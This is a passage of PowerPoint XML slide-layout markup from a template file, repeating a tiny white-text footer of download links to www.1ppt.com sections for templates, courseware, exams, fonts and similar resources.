              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout121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21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21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21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2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22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22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22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22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22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22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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout122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22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22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22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2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23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23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23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23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23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23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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout123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23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23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23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2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24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24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24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24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24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24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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
